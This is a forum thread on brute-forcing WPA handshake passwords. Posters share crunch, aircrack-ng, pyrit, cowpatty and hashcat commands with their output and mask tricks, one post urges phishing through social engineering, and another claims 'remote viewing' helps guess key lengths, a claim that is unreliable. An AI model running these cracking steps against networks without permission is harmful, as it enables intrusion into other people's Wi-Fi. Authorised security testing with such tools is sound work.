Page 1 of 2 12 LastLast
Results 1 to 50 of 62

Thread: Cracking WPA key with crunch | aircrack (almost fullproof but how speed things up)

  1. #1

    Question Cracking WPA key with crunch | aircrack (almost fullproof but how speed things up)

    Hello guys, I'm not going to discuss handshakes since I guess you all are familiar with airmon, airodump and aireplay and now how to get them.
    that's about the first step in cracking WPA and the easy job. The hard job is to actually crack the WPA key from the capfile.
    I was looking for a method that is full proof without actually storing a huge wordlist on your desktop (talking about lots of lots of terrabites)
    so i came up with the following:

    # crunch 0 25 abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWX YZ0123456789 | aircrack-ng --bssid aa:aa:aa:aa:aa:aa -w- handshakefile.cap

    (notice there is a space in the command that shouldnt be there, i guess the forum can't handle 62characters word)

    meaning that crunch is making a list with minimum 0 and maximum 25 characters with alfanumeric small and cap characters that are not stored in a wordlistfile.
    The "|" ends the crunch command and then we go to the aircrack command:
    With the bssid of the "victim" (notice you have to be authorised by the victim to do the test) and -w- wich specifies the handshake.cap file.


    It took me about 30 minutes to crack the following WPA password: hickmin123 (wich is an easy password because there are no caps in the password)
    However I believe its almost a fullproof method and with lots of time you are able to crack long passwords.
    Now the real question...

    Anyone has an idea how to edit my command in function of speeding up the cracking process with a precalculating tool cause that would be the coolest thing :-)
    Please notice I only like to use programs preinstalled in kali linux.
    Last edited by leevai; 2013-08-10 at 08:18. Reason: faulth in my kali command that needs an edit

  2. #2
    Join Date
    2013-Mar
    Location
    milano
    Posts
    301
    Quote Originally Posted by leevai View Post
    Hello guys, I'm not going to discuss handshakes since I guess you all are familiar with airmon, airodump and aireplay and now how to get them.
    that's about the first step in cracking WPA and the easy job. The hard job is to actually crack the WPA key from the capfile.
    I was looking for a method that is full proof without actually storing a huge wordlist on your desktop (talking about lots of lots of terrabites)
    so i came up with the following:

    # crunch 0 25 abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWX YZ0123456789 | aircrack-ng --bssid aa:aa:aa:aa:aa:aa -w- handshakefile.cap

    (notice there is a space in the command that shouldnt be there, i guess the forum can't handle 62characters word)

    meaning that crunch is making a list with minimum 0 and maximum 25 characters with alfanumeric small and cap characters that are not stored in a wordlistfile.
    The "|" ends the crunch command and then we go to the aircrack command:
    With the bssid of the "victim" (notice you have to be authorised by the victim to do the test) and -w- wich specifies the handshake.cap file.


    It took me about 30 minutes to crack the following WPA password: hickmin123 (wich is an easy password because there are no caps in the password)
    However I believe its almost a fullproof method and with lots of time you are able to crack long passwords.
    Now the real question...

    Anyone has an idea how to edit my command in function of speeding up the cracking process with a precalculating tool cause that would be the coolest thing :-)
    Please notice I only like to use programs preinstalled in kali linux.
    hi
    i'm not expert but the process of GPU-cracking is more fast!!
    my old-simple example with cuda
    https://vimeo.com/62995190

  3. #3
    hi
    i'm not expert but the process of GPU-cracking is more fast!!
    my old-simple example with cuda
    https://vimeo.com/62995190


    isn't that a method with existing wordlists? I'm looking for fast method to crack 12 digit unknown password with combination of small, caps and numbers and not in dictionary passwords with random combinations.
    Tried to watch the vid but unfortunately the quality of the vid is pretty low and can't read much of the screens.. sorry

  4. #4
    crunch 0 25 abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWX YZ0123456789 | pyrit -r xxx.cap -b xx:xx:xx:xx:xx:xx -i - attack_passthrough

  5. #5
    Join Date
    2013-Mar
    Location
    milano
    Posts
    301
    Quote Originally Posted by hausoo View Post
    crunch 0 25 abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWX YZ0123456789 | pyrit -r xxx.cap -b xx:xx:xx:xx:xx:xx -i - attack_passthrough
    @thanks +1 to help me to explane.....i've a extraterrestrial language
    @leevay sorry for the quality-video(but it's a partial-web-hosting-problem)..the FONT-VIDEO ,i have uploaded is good-quality!...however if you HAVE "" cuda-enable "" read the response of hausoo's friend ..contains the same question of my video
    bye
    Last edited by zimmaro; 2013-08-10 at 15:48.

  6. #6
    thanks a lot zimmaro!!

    Quote Originally Posted by zimmaro View Post
    @thanks +1 to help me to explane.....i've a extraterrestrial language
    @leevay sorry for the quality-video(but it's a partial-web-hosting-problem)..the FONT-VIDEO ,i have uploaded is good-quality!...however if you "" cuda-enable "" read the response of hausoo's friend
    bye

  7. #7
    hy haussoo,
    thanks for the reply a lot! I did a first check and seems to work fine. tomorrow i will be doing a test on my home pc as it is a much faster computer.

    Quote Originally Posted by hausoo View Post
    crunch 0 25 abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWX YZ0123456789 | pyrit -r xxx.cap -b xx:xx:xx:xx:xx:xx -i - attack_passthrough

  8. #8
    Is it possible this speeds up about 25%? greetz

  9. #9
    yes depends on your video card (cuda_cores)

    crack 12 digit unknown passwd

    crunch 12 12 abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWX YZ1234567890 | pyrit -r xxx.cap -b xx:xx:xx:xx:xx:xx -i - attack_passthrough

    crunch+aircrack-ng cpu-only

    HTML Code:
    ~# crunch 12 12 abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890 | aircrack-ng -w - -b xx:xx:xx:xx:xx:xx capture-03.cap
    Crunch will now generate the following amount of data: 12018631630886850560 bytes
    11461860304724 MB
    11193222953 GB
    10930881 TB
    10674 PB
    Crunch will now generate the following number of lines: 16533293572437839872 
    Opening capture-03.cap
    Reading packets, please wait...
    
    
    
                                     Aircrack-ng 1.2 beta1
    
    
                       [00:00:45] 180855 keys tested (4367.42 k/s)
    crunch+pyrit cpu+GPU (cuda 334 cores)
    Code:
    ~# crunch 12 12 abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890 | pyrit -r capture-03.cap -b xx:xx:xx:xx:xx:xx -i - attack_passthrough
    Crunch will now generate the following amount of data: 12018631630886850560 bytes
    11461860304724 MB
    11193222953 GB
    10930881 TB
    10674 PB
    Crunch will now generate the following number of lines: 16533293572437839872 
    Pyrit 0.4.1-dev (svn r308) (C) 2008-2011 Lukas Lueg http://pyrit.googlecode.com
    This code is distributed under the GNU General Public License v3+
    
    Parsing file 'capture-03.cap' (1/1)...
    Parsed 47 packets (47 802.11-packets), got 1 AP(s)
    
    ^CCrunch ending at aaaaaaaajKUl0 23400 PMKs per second.

  10. #10
    Quote Originally Posted by leevai View Post
    Code:
    crunch 0 25 abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 | aircrack-ng --bssid aa:aa:aa:aa:aa:aa -w- handshakefile.cap
    (notice there is a space in the command that shouldnt be there, i guess the forum can't handle 62characters word)
    This is a great post. Thanks. Especially pointing out the little vB code issue, most people overlook these small details. You could use CODE syntax to fix it.

  11. #11
    Quote Originally Posted by zimmaro View Post
    hi
    i'm not expert but the process of GPU-cracking is more fast!!
    my old-simple example with cuda
    https://vimeo.com/62995190
    Agreed. GPU cracking is faster.

  12. #12
    Join Date
    2013-Aug
    Posts
    1
    Quote Originally Posted by leevai View Post
    Hello guys, I'm not going to discuss handshakes since I guess you all are familiar with airmon, airodump and aireplay and now how to get them.
    that's about the first step in cracking WPA and the easy job. The hard job is to actually crack the WPA key from the capfile.
    I was looking for a method that is full proof without actually storing a huge wordlist on your desktop (talking about lots of lots of terrabites)
    so i came up with the following:

    # crunch 0 25 abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWX YZ0123456789 | aircrack-ng --bssid aa:aa:aa:aa:aa:aa -w- handshakefile.cap

    (notice there is a space in the command that shouldnt be there, i guess the forum can't handle 62characters word)

    meaning that crunch is making a list with minimum 0 and maximum 25 characters with alfanumeric small and cap characters that are not stored in a wordlistfile.
    The "|" ends the crunch command and then we go to the aircrack command:
    With the bssid of the "victim" (notice you have to be authorised by the victim to do the test) and -w- wich specifies the handshake.cap file.


    It took me about 30 minutes to crack the following WPA password: hickmin123 (wich is an easy password because there are no caps in the password)
    However I believe its almost a fullproof method and with lots of time you are able to crack long passwords.
    Now the real question...

    Anyone has an idea how to edit my command in function of speeding up the cracking process with a precalculating tool cause that would be the coolest thing :-)
    Please notice I only like to use programs preinstalled in kali linux.
    Hi,

    I tried many times to crack wpa with crunch but when i gave the command which you mentioned above is taking to much in reading packets. I mean when data amount is generated in Tera Bites Crunch hangs up in reading packets for a long long time. Can you please guide how to crack my simple password "wifi5214" within 30 minutes.

  13. #13
    Do not add the cap letters. Thats going to be much faster in your case.

  14. #14
    Join Date
    2013-Aug
    Posts
    9
    Quote Originally Posted by leevai View Post
    hi
    i'm not expert but the process of GPU-cracking is more fast!!
    my old-simple example with cuda
    https://vimeo.com/62995190


    isn't that a method with existing wordlists? I'm looking for fast method to crack 12 digit unknown password with combination of small, caps and numbers and not in dictionary passwords with random combinations.
    Tried to watch the vid but unfortunately the quality of the vid is pretty low and can't read much of the screens.. sorry
    have a look at the "hashcat". Hashcat uses GPU to crack the WPA. You can use it either with wordlist or bruteforce the combination of any type of digits

  15. #15
    30min= super computer gpu cluster gpu farm

    one gpu example
    Time.Started...: Sat Aug 24 21:32:28 2013 (32 secs)
    Time.Estimated.: Fri Apr 9 09:48:35 2021 (7 years, 227 days)

    Code:
    ./cudaHashcat-plus.bin -a 3 -m 2500 dd.hccap
    cudaHashcat-plus v0.14 by atom starting...
    
    Hashes: 1 total, 1 unique salts, 1 unique digests
    Bitmaps: 8 bits, 256 entries, 0x000000ff mask, 1024 bytes
    Workload: 16 loops, 8 accel
    Watchdog: Temperature abort trigger set to 70c
    Watchdog: Temperature retain trigger set to 60c
    Device #1: GeForce GTX 560, 1023MB, 1620Mhz, 7MCU
    Device #1: Kernel ./kernels/4318/m2500.sm_21.64.ptx
    
    [s]tatus [p]ause [r]esume [b]ypass [q]uit => s
    Session.Name...: cudaHashcat-plus
    Status.........: Running
    Input.Mode.....: Mask (?1?2?2?2?2?2?2?3)
    Hash.Target....: xxx (00:1d:7e:xx:xx:xx <-> 00:23:69:xx:xx:xx)
    Hash.Type......: WPA/WPA2
    Time.Started...: Sat Aug 24 21:32:28 2013 (32 secs)
    Time.Estimated.: Fri Apr  9 09:48:35 2021 (7 years, 227 days)
    Speed.GPU.#1...:    24637/s
    Recovered......: 0/1 (0.00%) Digests, 0/1 (0.00%) Salts
    Progress.......: 774144/5533380698112 (0.00%)
    Rejected.......: 0/774144 (0.00%)
    HWMon.GPU.#1...: -1% Util, 52c Temp, 55% Fan

  16. #16
    Join Date
    2013-Jul
    Location
    United States
    Posts
    520
    Quote Originally Posted by leevai View Post
    Hello guys, I'm not going to discuss handshakes since I guess you all are familiar with airmon, airodump and aireplay and now how to get them.
    that's about the first step in cracking WPA and the easy job. The hard job is to actually crack the WPA key from the capfile.
    I was looking for a method that is full proof without actually storing a huge wordlist on your desktop (talking about lots of lots of terrabites)
    so i came up with the following:

    # crunch 0 25 abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWX YZ0123456789 | aircrack-ng --bssid aa:aa:aa:aa:aa:aa -w- handshakefile.cap

    (notice there is a space in the command that shouldnt be there, i guess the forum can't handle 62characters word)

    meaning that crunch is making a list with minimum 0 and maximum 25 characters with alfanumeric small and cap characters that are not stored in a wordlistfile.
    The "|" ends the crunch command and then we go to the aircrack command:
    With the bssid of the "victim" (notice you have to be authorised by the victim to do the test) and -w- wich specifies the handshake.cap file.


    It took me about 30 minutes to crack the following WPA password: hickmin123 (wich is an easy password because there are no caps in the password)
    However I believe its almost a fullproof method and with lots of time you are able to crack long passwords.
    Now the real question...

    Anyone has an idea how to edit my command in function of speeding up the cracking process with a precalculating tool cause that would be the coolest thing :-)
    Please notice I only like to use programs preinstalled in kali linux.
    Yeah I don't know if anyone pointed this out but it wouldn't make sense to run

    Code:
    crunch 0 25 abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWX YZ0123456789 | aircrack-ng --bssid aa:aa:aa:aa:aa:aa -w- handshakefile.cap
    Instead, run

    Code:
     crunch 8 25 abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWX YZ0123456789 | aircrack-ng --bssid aa:aa:aa:aa:aa:aa -w- handshakefile.cap
    (I just changed the number of characters because WPA has to be at least 8 characters... should save a good amount of time.

  17. #17
    Join Date
    2014-Jan
    Posts
    1
    Can anyone please help me ??? I dont know how to get the .cap file. I know how to do everything else, except get the handshake file. Please help !!

  18. #18
    Quote Originally Posted by Greevaz View Post
    Can anyone please help me ??? I dont know how to get the .cap file. I know how to do everything else, except get the handshake file. Please help !!
    There is a plethora of information not only on this forum but throughout the web on how to do this.

    I would suggest starting at http://www.aircrack-ng.org/doku.php?id=cracking_wpa and then use what ever method you feel comfortable with to crack the .cap (there are also online services for this but to date I have not had any success with them)

    If still having difficulties use Google. (Google can be you're best friend)

    Rab.

  19. #19
    Join Date
    2013-Jul
    Posts
    844
    There are several issues is this blog that are not covered.

    1. We highly suggust you avoid using aircrack-ng when trying to dycrypt a WPA Password. Aircrack-ng may tell you that it sees a password in your cap file BUT will be unable to crack it. Dig thru the aircrack-ng forums and you will find this issue covered. You cannot trust this program to finds the password so you might throw alot of time at the problem for nothing.

    2. What is also not covered is the length of time it takes to brute force a character set like abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWX YZ0123456789. Even with our high speed 64bit computers running two ATI graphic cards and really high speed 100,000-150,000 this would take years.

    3. Lastly is saving your work in stages. You cannot expect to run a computer for months without refreshing it. If you refer to the thread below you will find a method of saving a crunch passthru. However we are unsure it will work with dictionaries as we use different tools.

    https://forums.kali.org/showthread.p...st-or-make-one

    If you want to crack WPA try a letter frequency approach. Furthermore you need to easily save your work in stages. The tool of choice is elcomsoft/windows 7 64 bit/high speed graphic cards. Use dictionaries wherever possible to save the computer from having to waste time computing in a passthru.

    We run the following sequence
    length 8 8 numeric Dictionary files broken into 200,000 chunks
    length 9 9 numeric Same as 8
    length 10 10 numeric Same as 8
    Common password - dictionaries
    WPA Word lists available thru torrent


    MTA/MTB

  20. #20
    Join Date
    2014-Jan
    Posts
    6
    I've been following this thread and experimenting with crunch and pyrit. I am trying to crack a handshake with a 10 length password of mixed lower case and numbers.

    Code:
    crunch 10 10 abcdefghijklmnopqrstuvwxyz0123456789 | pyrit -r test-01.cap -b 00:00:00:00:00:00 -i - attack_passthrough
    This is the output I am getting, why is it testing phrases over 10 characters long? I am assuming that when the program is cancelled the output is being overwritten by the PMKs per second? So I can ignore the last two numbers "55". Can crunch/pyrit be trusted to actually find the correct handshake pass phrase?

    Code:
    Crunch will now generate the following amount of data: 40217742840692736 bytes
    38354628411 MB
    37455691 GB
    36577 TB
    35 PB
    Crunch will now generate the following number of lines: 3656158440062976 
    Pyrit 0.4.0 (C) 2008-2011 Lukas Lueg http://pyrit.googlecode.com
    This code is distributed under the GNU General Public License v3+
    
    Parsing file 'test-01.cap' (1/1)...
    Parsed 31 packets (31 802.11-packets), got 1 AP(s)
    
    ^CCrunch ending at aaaaq6h76555 PMKs per second.
    I am planning on resuming the session by looking at the last passphase tested and starting again for example starting from bbbbbbbbbb:

    Code:
    crunch 10 10 abcdefghijklmnopqrstuvwxyz0123456789 -s bbbbbbbbbb | pyrit -r test-01.cap -b 00:00:00:00:00:00 -i - attack_passthrough

  21. #21
    Join Date
    2013-Jul
    Posts
    844
    Study the forum link we give above. Again we go not use this approach as it is too slow however we think this is the command string you would want to use is:

    crunch <MinPasswordLength> <MaxPasswordLength> <CharacterSetToBeUsed> -s <StartPoint> -d 4 | pyrit -e <APessid> -i - -o - passthrough | cowpatty -d - -r <Handshake.cap> -s <APessid>

    This avoids the aircrack-ng bug and gives you the ability to stop and start the program and ??WE THINK?? you can get CUDA and high-speed graphics cards working.



    IF you are referencing:

    CCrunch ending at aaaaq6h76555 PMKs per second

    as your crunch over 10 in length comment above, this is the intermediate PMK not the primary number set you choose which is 10 in length composed all lower caps and numbers. Study what a pmk is. This will lead you into rainbow tables. Before you jump into precomputing pmks or rainbow tables, note the precomputed pmk only works against a specific salt which is the --essid name of the AP. If they change the essid name all your work becomes worthless SO rainbox tables are normally only computed against common names for APs.

  22. #22
    Join Date
    2013-Apr
    Location
    LocalHost
    Posts
    4
    the best & fastest thing to use is hashcat... using it will give u less headache

  23. #23
    Join Date
    2014-Jan
    Location
    Italy (Prato)
    Posts
    5
    Quote Originally Posted by leevai View Post
    Hello guys, I'm not going to discuss handshakes since I guess you all are familiar with airmon, airodump and aireplay and now how to get them.
    that's about the first step in cracking WPA and the easy job. The hard job is to actually crack the WPA key from the capfile.
    I was looking for a method that is full proof without actually storing a huge wordlist on your desktop (talking about lots of lots of terrabites)
    so i came up with the following:

    # crunch 0 25 abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWX YZ0123456789 | aircrack-ng --bssid aa:aa:aa:aa:aa:aa -w- handshakefile.cap

    (notice there is a space in the command that shouldnt be there, i guess the forum can't handle 62characters word)

    meaning that crunch is making a list with minimum 0 and maximum 25 characters with alfanumeric small and cap characters that are not stored in a wordlistfile.
    The "|" ends the crunch command and then we go to the aircrack command:
    With the bssid of the "victim" (notice you have to be authorised by the victim to do the test) and -w- wich specifies the handshake.cap file.


    It took me about 30 minutes to crack the following WPA password: hickmin123 (wich is an easy password because there are no caps in the password)
    However I believe its almost a fullproof method and with lots of time you are able to crack long passwords.
    Now the real question...

    Anyone has an idea how to edit my command in function of speeding up the cracking process with a precalculating tool cause that would be the coolest thing :-)
    Please notice I only like to use programs preinstalled in kali linux.
    And how is possible?

    For this bruteforce calculator:



    (Website: http://calc.opensecurityresearch.com/)

    If I've 43.000 pmks for second with CUDA of GTX 580, I find the password after many years XD

    How is possible that you found your password "hickmin123" with mixalpha-numeric in 30 MINUTES? o_O

  24. #24
    Join Date
    2014-Feb
    Posts
    8
    When I start :
    crunch 8 25 abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWX YZ0123456789 | aircrack-ng --bssid aa:aa:aa:aa:aa:aa -w- handshakefile.cap
    I get this:
    (00:00:31) 14108 keys tested (508.08 k/s)
    Is this a good speed (508.08 k/s)?
    I have: Processor: AMD Athlon(tm) 64 X2 Dual Core Processor 4800+ × 2
    and wfi antena tp-link tlwn722n with 150mbps
    Please help
    Last edited by Alexcreator; 2014-02-23 at 08:05.

  25. #25
    Quote Originally Posted by Alexcreator View Post
    When I start :
    crunch 8 25 abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWX YZ0123456789 | aircrack-ng --bssid aa:aa:aa:aa:aa:aa -w- handshakefile.cap
    I get this:
    (00:00:31) 14108 keys tested (508.08 k/s)
    Is this a good speed (508.08 k/s)?
    I have: Processor: AMD Athlon(tm) 64 X2 Dual Core Processor 4800+ × 2
    and wfi antena tp-link tlwn722n with 150mbps
    Please help
    Well, I wouldn't complain... I can only get 5000 on my crappy machine

    Rab.

    Sorry mis read your post - it appears that it is the same rate as mine and that is poor by today's standard
    Last edited by flyinghaggis; 2014-02-23 at 10:53. Reason: Didn't read post properly

  26. #26
    Join Date
    2013-Mar
    Location
    milano
    Posts
    301
    Quote Originally Posted by Alexcreator View Post
    When I start :
    crunch 8 25 abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWX YZ0123456789 | aircrack-ng --bssid aa:aa:aa:aa:aa:aa -w- handshakefile.cap
    I get this:
    (00:00:31) 14108 keys tested (508.08 k/s)
    Is this a good speed (508.08 k/s)?
    I have: Processor: AMD Athlon(tm) 64 X2 Dual Core Processor 4800+ × 2
    and wfi antena tp-link tlwn722n with 150mbps
    Please help
    hi:
    i think
    ....it's a good speed for YOUR hardware /NO-GPU-METHOD
    ONLY for example(not to prove anything) in my hardware-virtualized with NO-GPU(because is virtualized) have this:
    http://www.imagestime.com/show.php/924265_1.PNG.html

    @click_ONTO_zoOM

  27. #27
    Join Date
    2014-Jan
    Location
    Italy (Prato)
    Posts
    5
    Quote Originally Posted by zimmaro View Post
    hi:
    i think
    ....it's a good speed for YOUR hardware /NO-GPU-METHOD
    ONLY for example(not to prove anything) in my hardware-virtualized with NO-GPU(because is virtualized) have this:
    http://www.imagestime.com/show.php/924265_1.PNG.html

    @click_ONTO_zoOM
    And also with CUDA this attack is useless.

    Look my screen, also with a password length of 8 this attack is impossible.

  28. #28
    Join Date
    2013-Mar
    Location
    milano
    Posts
    301
    Quote Originally Posted by Pikachu95 View Post
    And also with CUDA this attack is useless.

    Look my screen, also with a password length of 8 this attack is impossible.
    hi
    if this is your thinking I respect that!!! But for logic /probability/time/fortune ...is not totally impossible!
    && cuda (for-me)I think it can give you a REALLY GREAT hand in speeding up the process!

  29. #29
    Join Date
    2014-Jan
    Location
    Italy (Prato)
    Posts
    5
    Quote Originally Posted by zimmaro View Post
    hi
    if this is your thinking I respect that!!! But for logic /probability/time/fortune ...is not totally impossible!
    && cuda (for-me)I think it can give you a REALLY GREAT hand in speeding up the process!
    Is true what I wrote, it's not my thought.

    Use this calculator: http://calc.opensecurityresearch.com/ with charset lalpha-numeric.

    The bruteforce finish after 1 year!

    So, for example, if I put a WPA2 like: Zympo123, you must wait 1 year for crack this password with 83.000 PMKS.



    And 8 lenght is min., try with 9 or 10 lenght in that calculator

    Or try also with 8, but with MIXALPHA-NUMERIC.



    So? What's the solution?

  30. #30
    Join Date
    2013-Mar
    Location
    milano
    Posts
    301
    impossible ~= 1 year 39 days ........ecc
    impossible ~= 84 years 265 days.....ecc

    * ~= in matlab is ""different""

  31. #31
    Join Date
    2013-Jul
    Posts
    844
    The author of this thread was over optimistic when factoring the time required.

    You can try a letter frequency approach. The most frequent are etaoin

    etaoin shrdlu cmfwyp vbgkjq xz

    Run in this order

    etaoin0123456789
    etaoinshrdlu0123456789
    etaoinshrdlucmfwyp0123456789

    You should get the idea.

    Do not waste time with lengths over 10 so just do 8-10.

    Back when reaver was King we cracked around 100 wifi recievers using reaver and ran a statistical analysis of key types and lengths choosen by users.

    Over half were numeric less then 11
    Very few were greater then 10 in length
    Over half of the numeric were phone numbers
    Only 5% were greater then 10 in length.

    We have this paper around somewhere maybe we will republish as it was lost when aircrack-ng went down.

    The best way to brute force a key is to try and determine the length and key types used. You can then focus your brute force in that area.

    You could guess or:

    For those that want a more esoteric and focused guess try remote viewing. The Quality Assurance Division of ASN doesnot want you to develope these skills. Google Ed Dames for techniques.

    You do not remote view the key you remote view the length of the key, key consituents (type of characters) then turn to your computer to do the brute force. You also need two(2) people to conduct the remote viewing session.

    If you find the key longer then 11 and using one computer do not bother. You might get lucky with a dictionary.

    If you really need the key try the WPA phishing programs turbn to social engineering using pwnstar. See aircrack-ng forums I think under programs.

    Musket Team A/C

  32. #32
    Quote Originally Posted by mmusket33 View Post

    You can try a letter frequency approach. The most frequent are etaoin

    etaoin shrdlu cmfwyp vbgkjq xz

    Run in this order

    etaoin0123456789
    etaoinshrdlu0123456789
    etaoinshrdlucmfwyp0123456789

    You should get the idea.

    Musket Team A/C
    How would I run this in Elcomsoft Wireless Auditor? I have had difficulty setting this programme up
    with a Brute force running custom Char Set.

    Rab.

  33. #33
    Quote Originally Posted by mmusket33 View Post
    Dear Rab,
    There is an attack called the mask attack. You will need a version of elcomsoft probably v5.0.252 or v5.1.271 that supports this. If you want to do a letter frequency approach there is a page that allows you to enter the characters you want. Study the help files.

    MTC
    Sorry, yes it is the mask attack I was referring to.

    From the help file, which I missed from first time of reading, I am guessing that

    In the Mask Attack options under Custom Charset I would enter something like - zwerfalj and in the mask field
    I would enter ?1?1?1?1?1?1?1?1 could you confirm please.

    If you could also point me to a windows proggy that can precompute a dictionary attack other than oclHashcat I have
    used L517 v0.8 in the past (although good it is not user friendly and only allows output upto 2gb if memory serves me right)
    but I would like to compute the dictionary based on the starting point of one character for instance (r) which could be eliminated
    and the rest to be random up to 8 that would reduce the size of the file and would be more like a lucky dip (hit or Miss) then on failure
    I would be able to try another char (w) rather than going thru the complete char set from a to z.

    I would just like to add my thanks for responding to this post - I have noticed from previous posts that
    you advocate the use of EWSA and I myself like it too.

    Rab.

    I have now worked out most of the above. It uses a similar format to oclHashcat but I am still interested in a good password generator
    for windows
    Last edited by g0tmi1k; 2014-12-09 at 11:41.

  34. #34
    Join Date
    2013-Jul
    Posts
    844
    We found the best word generator turned out to be crunch. Google Crunch A Day With Tape. You will need to write the output to file. When loading the dictionaries into elcomsoft, the drop-down menu has a file types entry. Click on the arrow point on the right side and change to all files or your files made with crunch will not be seen. If we remember correctly you can also set the file size with crunch. Keep these files small.
    The only thing left is administrative in nature. We make a local area telephone types and 8 to 9 numeric length file in Elcomsoft input the dictionaries and just add handshakes to the file. We have a 10 length dictionary file again adding handshakes, and then large dictionary file. Anytime we get a handshake we stop any ongoing process and run it against the telephone 8 9 numeric first as most of your hits will be telephone numbers-numeric 8,9 and 10.

  35. #35

    **** Country no law for breaking someone's private wifi.

    Hello, mmusket33

    Im new BTW, im just starting to learn kali linux and just wondering if my new neighbor is sneaking up to my wifi (eversince they moved my internet slowed down). I manage to get the .hccap and .cap file can u tell me what my passphrase is? my router is Linksys WRT54G.

    Im just wondering if it is possible to crack with so little time-i say they moved in our area for 3 days now.

    Sorry for inconvenience. Hoping for a reply soon. Thanks.
    Attached Files Attached Files

  36. #36
    Join Date
    2014-Mar
    Posts
    1
    So far I have notice crunch just being a waste of time, just for the fact that I know that 70% of word list is useless. no one in their right mind is going to use a password that it generates.

    example:
    aaaaaaaa01
    aaaaaaaa02
    aaaaaaaa03

  37. #37
    Quote Originally Posted by GlockSmok3 View Post
    So far I have notice crunch just being a waste of time, just for the fact that I know that 70% of word list is useless. no one in their right mind is going to use a password that it generates.

    example:
    aaaaaaaa01
    aaaaaaaa02
    aaaaaaaa03
    you never know, my friend. Just like there are password for password and there are 12345 as password
    Where is the darn "any key" key?

  38. #38
    Join Date
    2014-May
    Posts
    2
    Seems that using crunch to generate a wordlist is a bit overkill. I don't know where you get your horsepower, but 10674 petabytes sounds like a bit too much data to be useful as a cracking list. Have you thought about simply mangling a traditional dictionary instead? I couldn't find a tool that would do it, so I wrote one (https://github.com/zeroskill/transmute). If you seed it with a reasonable word list (http://www-01.sil.org/linguistics/wordlists/english/) and give it reasonable options, the resulting list will be a much smaller search space, and is pretty likely to yield a useful result against typical targets. There's always going to be the "CorrectHorseBatteryStaple" users, but low hanging fruit is generally what you're after when trying to penetrate.

  39. #39
    Join Date
    2014-Dec
    Posts
    1
    Hi, all.

    Is there a way to run this but somehow tell the program not to use double letters? I would like to reduce the time needed to try out different combinations by avoiding combinations like bbbbgasd or any combination where two same letters appear one after another. It would seem more logical to me, because in my language we don't have words like that, so any help on how to do this would be appreciated.

  40. #40
    Join Date
    2014-Sep
    Posts
    13
    Hi,

    Can someone help me on how to generate pws /w crunch using only min 8 and max 8 char long letters (char set = 26 english abc lowercase) but each character should appear maximum TWICE.
    e.g.
    abcdeefg
    or
    aabcdefg
    or
    abcdbefg
    or
    lmnoppqr
    or
    opqrstsu

    etc..

  41. #41
    Join Date
    2013-Jul
    Posts
    844
    To backt

    This would take a long time to complete but it could be done. This would keep the file sizes down.
    Google Crunch A Day With Tape - an excellent tutorial there are two tutorials by this author

    Crunch will let you compute fixed positions with variables surround it for example:

    The aa has eight positions

    aa@@@@@@
    @aa@@@@@
    @@aa@@@@
    @@@aa@@@
    @@@@aa@@
    @@@@@aa@
    @@@@@@aa
    a@@@@@@a

    Therefore:

    crunch 8 8 "bcdefghijklmnopqrstuvwxyz" -t aa@@@@@@ -o File-aa@@@@@@
    crunch 8 8 "bcdefghijklmnopqrstuvwxyz" -t @aa@@@@@ -o File-@aa@@@@@
    crunch 8 8 "bcdefghijklmnopqrstuvwxyz" -t @@aa@@@@ -o File-@@aa@@@@
    crunch 8 8 "bcdefghijklmnopqrstuvwxyz" -t @@@aa@@@ -o File-@@@aa@@@
    crunch 8 8 "bcdefghijklmnopqrstuvwxyz" -t @@@@aa@@ -o File-@@@@aa@@
    crunch 8 8 "bcdefghijklmnopqrstuvwxyz" -t @@@@@aa@ -o File-@@@@@aa@
    crunch 8 8 "bcdefghijklmnopqrstuvwxyz" -t @@@@@@aa -o File-@@@@@@aa
    crunch 8 8 "bcdefghijklmnopqrstuvwxyz" -t a@@@@@@a -o File-a@@@@@@a

    Unfortunately you have another approx 40 positions counting duplicates where two aa could be placed

    Note our example has alot of duplicates this is just a rough overview

    a@a@@@@@
    @a@a@@@@
    @@a@a@@@
    @@@a@a@@
    @@@@a@a@
    @@@@@a@a
    a@@@@@a@
    @a@@@@@a

    a@@a@@@@
    @a@@a@@@
    @@a@@a@@
    @@@a@@a@
    @@@@a@@a
    a@@@@a@@
    @a@@@@a@
    @@a@@@@a

    a@@@a@@@
    @a@@@a@@
    @@a@@@a@
    @@@a@@@a
    a@@@a@@@
    @a@@@a@@
    @@@a@@a@
    @@@a@@@a


    a@@@@a@@
    @a@@@@a@
    etc


    a@@@@@a@
    @a@@@@@a
    etc

    a@@@@@@a
    aa@@@@@@
    etc

    You have to do this with all 26 characters


    crunch 8 8 "acdefghijklmnopqrstuvwxyz" -t bb@@@@@@ -o File-bb@@@@@@

    etc

    crunch 8 8 "abdefghijklmnopqrstuvwxyz" -t cc@@@@@@ -o File-bb@@@@@@

    etc

    we suggest you make the file dos compatible with

    cat File-aa@@@@@@ | unix2dos > File-aa@@@@@@dos.txt

    Then remove duplicates by joining all the aa files then

    cat aa@@@@@@dos.txt | sort -u > aa@@@@@@dos.txt


    Publish your work when you are finished.

    MTeams

  42. #42
    Join Date
    2014-Sep
    Posts
    13
    Quote Originally Posted by mmusket33 View Post
    To backt

    This would take a long time to complete but it could be done. This would keep the file sizes down.
